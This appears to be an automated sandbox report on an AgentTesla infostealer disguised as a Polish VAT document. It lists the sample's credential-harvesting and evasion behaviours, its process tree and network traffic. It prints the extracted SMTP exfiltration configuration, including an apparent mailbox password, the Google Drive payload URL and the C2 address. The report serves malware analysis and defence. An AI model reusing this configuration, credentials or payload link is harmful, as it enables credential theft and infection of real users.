Loading ...

Play interactive tourEdit tour

Windows Analysis Report Dokument VAT I - 85926 09 2021 MAG-8.exe

Overview

General Information

Sample Name:Dokument VAT I - 85926 09 2021 MAG-8.exe
Analysis ID:1362
MD5:0a2f51e6d3650f115c1b5484afbdf3a7
SHA1:6283d55e065802036f0e5da958bfd458a7999c09
SHA256:e49ff3e9ecbbe320e8cd29470d13b72643674b66e75ab5a824dda36eef6bf05e
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Dokument VAT I - 85926 09 2021 MAG-8.exe (PID: 6104 cmdline: 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe' MD5: 0A2F51E6D3650F115C1B5484AFBDF3A7)
    • RegAsm.exe (PID: 9176 cmdline: 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 9184 cmdline: 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 9192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comonyecarl@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: RegAsm.exe PID: 9184JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: RegAsm.exe PID: 9184JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Overview

          Networking:

          barindex
          Sigma detected: RegAsm connects to smtp portShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 109.169.39.245, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 9184, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49746

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe.6104.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comonyecarl@gmail.com"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeVirustotal: Detection: 20%Perma Link
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeReversingLabs: Detection: 13%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208BE040 CryptUnprotectData,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208BE731 CryptUnprotectData,
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49721 version: TLS 1.2

          Networking:

          barindex
          Source: Joe Sandbox ViewASN Name: IOMART-ASGB IOMART-ASGB
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln9ke6chkrap6m6ju294o2tb81ut9j/1632741825000/00519186742208262786/*/1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.11.20:49746 -> 109.169.39.245:587
          Source: global trafficTCP traffic: 192.168.11.20:49746 -> 109.169.39.245:587
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: RegAsm.exe, 00000014.00000002.5629638860.000000001DA83000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
          Source: RegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: RegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: RegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: RegAsm.exe, 00000014.00000003.1051196874.0000000000D25000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: RegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: RegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
          Source: RegAsm.exe, 00000014.00000003.1051196874.0000000000D25000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: RegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpString found in binary or memory: http://gnOVon.com
          Source: RegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpString found in binary or memory: http://mail.reyesyasociados.com
          Source: RegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: RegAsm.exe, 00000014.00000002.5630991580.000000001DB2E000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5631232287.000000001DB48000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5631519492.000000001DB72000.00000004.00000001.sdmpString found in binary or memory: https://Qwh5PdqjYgeEDA.com
          Source: RegAsm.exe, 00000014.00000003.1051196874.0000000000D25000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
          Source: RegAsm.exe, 00000014.00000002.5608363099.0000000000CDA000.00000004.00000020.sdmpString found in binary or memory: https://doc-10-50-docs.googleusercontent.com/
          Source: RegAsm.exe, 00000014.00000002.5608363099.0000000000CDA000.00000004.00000020.sdmpString found in binary or memory: https://doc-10-50-docs.googleusercontent.com/B
          Source: RegAsm.exe, 00000014.00000003.1051560437.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://doc-10-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln9ke6
          Source: RegAsm.exe, 00000014.00000002.5607273595.0000000000C98000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
          Source: RegAsm.exe, 00000014.00000002.5607273595.0000000000C98000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/q
          Source: RegAsm.exe, 00000014.00000002.5606749420.0000000000C20000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F
          Source: RegAsm.exe, 00000014.00000003.1051560437.0000000000D1E000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9FwScCiKPysDGcsBBd8
          Source: RegAsm.exe, 00000014.00000002.5606749420.0000000000C20000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9Fwininet.dllMozilla/5
          Source: RegAsm.exe, 00000014.00000002.5629638860.000000001DA83000.00000004.00000001.sdmp, RegAsm.exe, 00000014.00000002.5630557276.000000001DAE8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
          Source: RegAsm.exe, 00000014.00000002.5629638860.000000001DA83000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
          Source: RegAsm.exe, 00000014.00000002.5629638860.000000001DA83000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: RegAsm.exe, 00000014.00000002.5629638860.000000001DA83000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
          Source: RegAsm.exe, 00000014.00000002.5631295116.000000001DB4E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: RegAsm.exe, 00000014.00000002.5630557276.000000001DAE8000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: RegAsm.exe, 00000014.00000002.5628826946.000000001DA31000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln9ke6chkrap6m6ju294o2tb81ut9j/1632741825000/00519186742208262786/*/1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49721 version: TLS 1.2
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00878C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0087A2E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_008756D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00870780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00870720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_008B1130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_008B4320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_008BC7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_008B3A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_008BBA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_008B3708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00916D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_009107E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00DCCA90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00DCD21E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00DCBCD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00DC3330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00DC9600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_1D8C5E08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_1D8C4ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_1D8C5DC3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_1D8C6AF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208BB4C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B68D8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208BF1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B2BD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B5740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B6B7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208BBCF4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B0040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208BBD10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B1157
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exe, 00000000.00000000.557722097.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameAfblomstrings8.exe vs Dokument VAT I - 85926 09 2021 MAG-8.exe
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeBinary or memory string: OriginalFilenameAfblomstrings8.exe vs Dokument VAT I - 85926 09 2021 MAG-8.exe
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeVirustotal: Detection: 20%
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeReversingLabs: Detection: 13%
          Source: Dokument VAT I - 85926 09 2021 MAG-8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: unknownProcess created: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exe'
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3952A769DDC02D2F.TMPJump to behavior
          Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@6/1@3/4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9192:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9192:120:WilError_03
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_00403E4C push esp; iretd
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_00404E5C push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_00405029 push FFFFFFFBh; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_0040769A push ebp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_004040B4 push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_00403F77 push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_00407304 push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_0040713E push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_004071F5 push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_00408789 push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_00407D93 push esp; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_02BD2C24 push esp; retf
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_02BD307F push edx; ret
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_02BD1671 pushad ; iretd
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_02BD005A push ecx; iretd
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_02BD1651 pushad ; iretd
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_02BD5590 push esi; retf
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeCode function: 0_2_02BD053C push esi; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B1650 pushad ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_208B0312 push 8BFFFFFFh; retf
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeFile created: \dokument vat i - 85926 09 2021 mag-8.exe
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeFile created: \dokument vat i - 85926 09 2021 mag-8.exe
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeFile created: \dokument vat i - 85926 09 2021 mag-8.exe
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeFile created: \dokument vat i - 85926 09 2021 mag-8.exe
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Dokument VAT I - 85926 09 2021 MAG-8.exeProcess information set: NOOPENFILEERRORBOX
